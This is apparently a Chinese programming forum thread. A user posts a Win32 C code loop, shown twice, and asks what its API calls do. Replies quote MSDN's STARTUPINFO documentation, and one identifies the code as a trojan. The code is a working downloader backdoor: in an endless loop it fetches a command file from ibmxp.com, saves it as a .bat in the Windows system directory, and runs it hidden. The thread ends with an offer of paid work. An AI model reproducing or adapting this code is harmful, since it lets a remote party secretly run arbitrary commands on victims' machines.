HKEY mKeyInprogSever32;
unsigned char mGMTtime[128];
DWORD cbData=128;
DWORD ValueType;
char mDataBuf[256];
WORD wVersionRequested;
WSADATA wsaData;
SOCKET m_hSocket;
SOCKADDR_IN sockAddr;
int iResult;
int mGMTPos1;
int mGMTPos2;
int mCmdPos;
DWORD BytesToWrite,BytesWritten;
HANDLE fHandle=NULL;
char PathBuf[128];
PROCESS_INFORMATION pi;
STARTUPINFO si;
for(;;)
{
RegOpenKeyEx( HKEY_CLASSES_ROOT,
"CLSID\\{A0BEC94E-4D62-11D6-AF01-0010C6081DD0}\\InprocServer32",
0,
0,
&mKeyInprogSever32);
RegQueryValueEx( mKeyInprogSever32,
"LastGMTTime",
NULL,
&ValueType,
mGMTtime,
&cbData);
//************** Get CMD HTML ***********
wsprintf(mDataBuf,"GET /zt88588/%s/index.txt HTTP/1.1\r\nIf-Modified-Since:%s\r\nHost: ibmxp.com\r\nConnection: close\r\n\r\n",
HostName,
mGMTtime); DWORD m_dwTimeout=8000; wVersionRequested = MAKEWORD( 1, 1 );
iResult = WSAStartup( wVersionRequested, &wsaData );
if(iResult !=0)
goto mNext0 ; //2.创建socket套接字
m_hSocket = socket(AF_INET, SOCK_STREAM, 0);
if(m_hSocket==INVALID_SOCKET)
{ WSACleanup( ); goto mNext0;}
//3.建立套接字连接
ZeroMemory(&sockAddr, sizeof(sockAddr)); sockAddr.sin_family = AF_INET;
sockAddr.sin_port = htons((u_short)80);
LPHOSTENT lphost;
lphost = gethostbyname("ibmxp.com");
if (lphost != NULL)
{
sockAddr.sin_addr.s_addr = ((LPIN_ADDR)lphost->h_addr)->s_addr;
}
else
{ goto mNext1;
}
iResult=connect(m_hSocket, (SOCKADDR*)&sockAddr, sizeof(sockAddr));
if(iResult !=0)
{goto mNext1;}
if (send(m_hSocket, mDataBuf, lstrlen(mDataBuf), 0) == SOCKET_ERROR)
{
goto mNext1;
}
if(!ReadResponse(m_hSocket,cmdhtml,sizeof(cmdhtml)))
{
goto mNext1;
} closesocket( m_hSocket); WSACleanup( );//************** IF 200 OK *************
if(mFindSubStr(0,cmdhtml,"200 OK")==-1)
{
RegCloseKey(mKeyInprogSever32);
goto mNext0;
}
//************** Keep GMT time ********
mGMTPos1=mFindSubStr(0,cmdhtml,"Date:");
mGMTPos2=mFindSubStr(mGMTPos1,cmdhtml,"\r\n");
lstrcpyn((char *)mGMTtime,cmdhtml+mGMTPos1+5,mGMTPos2-mGMTPos1-5+1);
RegSetValueEx( mKeyInprogSever32,"LastGMTTime",
0,
REG_SZ,
(const unsigned char *)mGMTtime,
mGMTPos2-mGMTPos1);
RegCloseKey(mKeyInprogSever32);//*************** Save cmd file ***********
mCmdPos=mFindSubStr(0,cmdhtml,"\r\n\r\n"); GetSystemDirectory(PathBuf,128);
lstrcat( PathBuf,"\\Winini31.bat" ); fHandle=CreateFile(PathBuf,
GENERIC_WRITE,
0,
NULL,
CREATE_ALWAYS ,
FILE_ATTRIBUTE_NORMAL,
NULL);
if(fHandle==INVALID_HANDLE_VALUE)
goto mNext0; BytesToWrite=lstrlen(cmdhtml)-mCmdPos-4;
WriteFile( fHandle,
cmdhtml+mCmdPos+4,
BytesToWrite,
&BytesWritten,
NULL);
CloseHandle(fHandle);
//********* Execute Cmd File **********
ZeroMemory(&si,sizeof(STARTUPINFO));
si.cb = sizeof(STARTUPINFO);
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_HIDE; CreateProcess(NULL,PathBuf,NULL,NULL,TRUE,
0,NULL,NULL,&si,&pi);
mNext1:closesocket( m_hSocket);
WSACleanup( );
mNext0: Sleep(10000);
}
return 0;
}
unsigned char mGMTtime[128];
DWORD cbData=128;
DWORD ValueType;
char mDataBuf[256];
WORD wVersionRequested;
WSADATA wsaData;
SOCKET m_hSocket;
SOCKADDR_IN sockAddr;
int iResult;
int mGMTPos1;
int mGMTPos2;
int mCmdPos;
DWORD BytesToWrite,BytesWritten;
HANDLE fHandle=NULL;
char PathBuf[128];
PROCESS_INFORMATION pi;
STARTUPINFO si;
for(;;)
{
RegOpenKeyEx( HKEY_CLASSES_ROOT,
"CLSID\\{A0BEC94E-4D62-11D6-AF01-0010C6081DD0}\\InprocServer32",
0,
0,
&mKeyInprogSever32);
RegQueryValueEx( mKeyInprogSever32,
"LastGMTTime",
NULL,
&ValueType,
mGMTtime,
&cbData);
//************** Get CMD HTML ***********
wsprintf(mDataBuf,"GET /zt88588/%s/index.txt HTTP/1.1\r\nIf-Modified-Since:%s\r\nHost: ibmxp.com\r\nConnection: close\r\n\r\n",
HostName,
mGMTtime); DWORD m_dwTimeout=8000; wVersionRequested = MAKEWORD( 1, 1 );
iResult = WSAStartup( wVersionRequested, &wsaData );
if(iResult !=0)
goto mNext0 ; //2.创建socket套接字
m_hSocket = socket(AF_INET, SOCK_STREAM, 0);
if(m_hSocket==INVALID_SOCKET)
{ WSACleanup( ); goto mNext0;}
//3.建立套接字连接
ZeroMemory(&sockAddr, sizeof(sockAddr)); sockAddr.sin_family = AF_INET;
sockAddr.sin_port = htons((u_short)80);
LPHOSTENT lphost;
lphost = gethostbyname("ibmxp.com");
if (lphost != NULL)
{
sockAddr.sin_addr.s_addr = ((LPIN_ADDR)lphost->h_addr)->s_addr;
}
else
{ goto mNext1;
}
iResult=connect(m_hSocket, (SOCKADDR*)&sockAddr, sizeof(sockAddr));
if(iResult !=0)
{goto mNext1;}
if (send(m_hSocket, mDataBuf, lstrlen(mDataBuf), 0) == SOCKET_ERROR)
{
goto mNext1;
}
if(!ReadResponse(m_hSocket,cmdhtml,sizeof(cmdhtml)))
{
goto mNext1;
} closesocket( m_hSocket); WSACleanup( );//************** IF 200 OK *************
if(mFindSubStr(0,cmdhtml,"200 OK")==-1)
{
RegCloseKey(mKeyInprogSever32);
goto mNext0;
}
//************** Keep GMT time ********
mGMTPos1=mFindSubStr(0,cmdhtml,"Date:");
mGMTPos2=mFindSubStr(mGMTPos1,cmdhtml,"\r\n");
lstrcpyn((char *)mGMTtime,cmdhtml+mGMTPos1+5,mGMTPos2-mGMTPos1-5+1);
RegSetValueEx( mKeyInprogSever32,"LastGMTTime",
0,
REG_SZ,
(const unsigned char *)mGMTtime,
mGMTPos2-mGMTPos1);
RegCloseKey(mKeyInprogSever32);//*************** Save cmd file ***********
mCmdPos=mFindSubStr(0,cmdhtml,"\r\n\r\n"); GetSystemDirectory(PathBuf,128);
lstrcat( PathBuf,"\\Winini31.bat" ); fHandle=CreateFile(PathBuf,
GENERIC_WRITE,
0,
NULL,
CREATE_ALWAYS ,
FILE_ATTRIBUTE_NORMAL,
NULL);
if(fHandle==INVALID_HANDLE_VALUE)
goto mNext0; BytesToWrite=lstrlen(cmdhtml)-mCmdPos-4;
WriteFile( fHandle,
cmdhtml+mCmdPos+4,
BytesToWrite,
&BytesWritten,
NULL);
CloseHandle(fHandle);
//********* Execute Cmd File **********
ZeroMemory(&si,sizeof(STARTUPINFO));
si.cb = sizeof(STARTUPINFO);
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_HIDE; CreateProcess(NULL,PathBuf,NULL,NULL,TRUE,
0,NULL,NULL,&si,&pi);
mNext1:closesocket( m_hSocket);
WSACleanup( );
mNext0: Sleep(10000);
}
return 0;
}
--------------------------------------------------------------
by伟大的领秀,伟大的导师,伟大的舵手,天才程序员:xuzzzhen123
我简要的把问题提出来吧:
1\for(;;)是无限循环吗?
2\WSAStartup( wVersionRequested, &wsaData );是开启什么?
3\ZeroMemory(&sockAddr, sizeof(sockAddr));怎么解释
4\sockAddr.sin_addr.s_addr 什么变量?
5\ si是什么东西?
2、使用Socket初始化
3、将sockAddr置零
4、具体参看msdn
5、STARTUPINFO si ;一个结构体变量以下摘自msdn6.0STARTUPINFO
The STARTUPINFO structure is used with the CreateProcess function to specify main window properties if a new window is created for the new process. For graphical user interface (GUI) processes, this information affects the first window created by theCreateWindow function and shown by theShowWindow function. For console processes, this information affects the console window if a new console is created for the process. A process can use the GetStartupInfo function to retrieve the STARTUPINFO structure specified when the process was created. typedef struct _STARTUPINFO { // si
DWORD cb;
LPTSTR lpReserved;
LPTSTR lpDesktop;
LPTSTR lpTitle;
DWORD dwX;
DWORD dwY;
DWORD dwXSize;
DWORD dwYSize;
DWORD dwXCountChars;
DWORD dwYCountChars;
DWORD dwFillAttribute;
DWORD dwFlags;
WORD wShowWindow;
WORD cbReserved2;
LPBYTE lpReserved2;
HANDLE hStdInput;
HANDLE hStdOutput;
HANDLE hStdError;
} STARTUPINFO, *LPSTARTUPINFO;
Members
cb
Specifies the size, in bytes, of the structure.
lpReserved
Reserved. Set this member to NULL before passing the structure to CreateProcess.
lpDesktop
Windows NT: Pointer to a zero-terminated string that specifies either the name of the desktop only or the name of both the desktop and window station for this process. A backslash in the string pointed to by lpDesktop indicates that the string includes both desktop and window station names. If lpDesktop is NULL, the new process inherits the desktop and window station of its parent process. If lpDesktop is an empty string, the process does not inherit the desktop and window station of its parent process; instead, the system determines if a new desktop and window station need to be created. If the impersonated user already has a desktop, the system will use the existing desktop.
lpTitle
For console processes, this is the title displayed in the title bar if a new console window is created. If NULL, the name of the executable file is used as the window title instead. This parameter must be NULL for GUI or console processes that do not create a new console window.
dwX, dwY
Ignored unless dwFlags specifies STARTF_USEPOSITION. Specifies the x and y offsets, in pixels, of the upper left corner of a window if a new window is created. The offsets are from the upper left corner of the screen. For GUI processes, the specified position is used the first time the new process calls CreateWindow to create an overlapped window if the x parameter of CreateWindow is CW_USEDEFAULT.
dwXSize, dwYSize
Ignored unless dwFlags specifies STARTF_USESIZE. Specifies the width (dwXSize) and height (dwYSize), in pixels, of the window if a new window is created. For GUI processes, this is used only the first time the new process calls CreateWindow to create an overlapped window if the nWidth parameter of CreateWindow is CW_USEDEFAULT.
dwXCountChars, dwYCountChars
Ignored unless dwFlags specifies STARTF_USECOUNTCHARS. For console processes, if a new console window is created, dwXCountChars specifies the screen buffer width in character columns, and dwYCountChars specifies the screen buffer height in character rows. These values are ignored in GUI processes.
dwFillAttribute
Ignored unless dwFlags specifies STARTF_USEFILLATTRIBUTE. Specifies the initial text and background colors if a new console window is created in a console application. These values are ignored in GUI applications. This value can be any combination of the following values: FOREGROUND_BLUE, FOREGROUND_GREEN, FOREGROUND_RED, FOREGROUND_INTENSITY, BACKGROUND_BLUE, BACKGROUND_GREEN, BACKGROUND_RED, and BACKGROUND_INTENSITY. For example, the following combination of values produces red text on a whilte background:
FOREGROUND_RED | BACKGROUND_RED | BACKGROUND_GREEN | BACKGROUND_BLUE
dwFlags
This is a bit field that determines whether certain STARTUPINFO members are used when the process creates a window. Any combination of the following values can be specified: Value Meaning
STARTF_USESHOWWINDOW If this value is not specified, the wShowWindow member is ignored.
STARTF_USEPOSITION If this value is not specified, the dwX and dwY members are ignored.
STARTF_USESIZE If this value is not specified, the dwXSize and dwYSize members are ignored.
STARTF_USECOUNTCHARS If this value is not specified, the dwXCountChars and dwYCountChars members are ignored.
STARTF_USEFILLATTRIBUTE If this value is not specified, the dwFillAttribute member is ignored.
STARTF_FORCEONFEEDBACK If this value is specified, the cursor is in feedback mode for two seconds after CreateProcess is called. If during those two seconds the process makes the first GUI call, the system gives five more seconds to the process. If during those five seconds the process shows a window, the system gives five more seconds to the process to finish drawing the window.
The system turns the feedback cursor off after the first call toGetMessage, regardless of whether the process is drawing.
For more information on feedback, see the following Res section.
STARTF_FORCEOFFFEEDBACK If specified, the feedback cursor is forced off while the process is starting. The normal cursor is displayed. For more information on feedback, see the following Res section.
STARTF_USESTDHANDLES If this value is specified, sets the standard input of the process, standard output, and standard error handles to the handles specified in the hStdInput, hStdOutput, and hStdError members of the STARTUPINFO structure. The CreateProcess function's fInheritHandles parameter must be set to TRUE for this to work properly.
If this value is not specified, the hStdInput, hStdOutput, and hStdError members of the STARTUPINFO structure are ignored.
wShowWindow
Ignored unless dwFlags specifies STARTF_USESHOWWINDOW. The wshowWindow member can be any of the SW_ constants defined in WINUSER.H. For GUI processes, wShowWindow specifies the default value the first timeShowWindow is called. The nCmdShow parameter of ShowWindow is ignored. In subsequent calls to ShowWindow, the wShowWindow member is used if the nCmdShow parameter of ShowWindow is set to SW_SHOWDEFAULT.
cbReserved2
Reserved; must be zero.
lpReserved2
Reserved; must be NULL.
hStdInput
Ignored unless dwFlags specifies STARTF_USESTDHANDLES. Specifies a handle that will be used as the standard input handle to the process if STARTF_USESTDHANDLES is specified.
hStdOutput
Ignored unless dwFlags specifies STARTF_USESTDHANDLES. Specifies a handle that will be used as the standard output handle to the process if STARTF_USESTDHANDLES is specified.
hStdError
Ignored unless dwFlags specifies STARTF_USESTDHANDLES. Specifies a handle that will be used as the standard error handle to the process if STARTF_USESTDHANDLES is specified.
Res
If a GUI process is being started and neither STARTF_FORCEONFEEDBACK or STARTF_FORCEOFFFEEDBACK is specified, the process feedback cursor is used. A GUI process is one whose subsystem is specified as "windows."
这个for(;;)循环里面使用了RegOpenKeyEx\\ 打开注册表
RegQueryValueEx\\查询注册表
然后,紧接着1个wsprintf()是为了把什么数据给mDataBuf,给mDataBuf的目的是什么?
要像这样讲解下去,才算是好
如果你想学C++,这些问题最好自己解决
看MSDN,之前还要先去复习一下C++课本至于程序思路是什么?
不是你现在需要考虑的事情不排除有人为了分给你回答,但是这些问题不应该问人的---------------------
语气中如有不能接受之处,我收回我所说的
好像是从ibmxp.com的页面取的 cmd代码写入.bat文件,然后执行算木马程序吧
你的提议我接受了,我认为你的提议很真切,也很诚恳,难得是诤友,当面敢批评嘛,谢谢。我会去重温C++语法的。其实我以前看过也很熟悉了,但有一段时间没有触摸,所以有些生熟了,而现在我又比较忙,所以没有大面积的时间去重看。另外说一下:你的水平很高,这么一小段代码你就看出来是木马了。
如果有兴趣挣点钱,你可以跟我联系:406865108。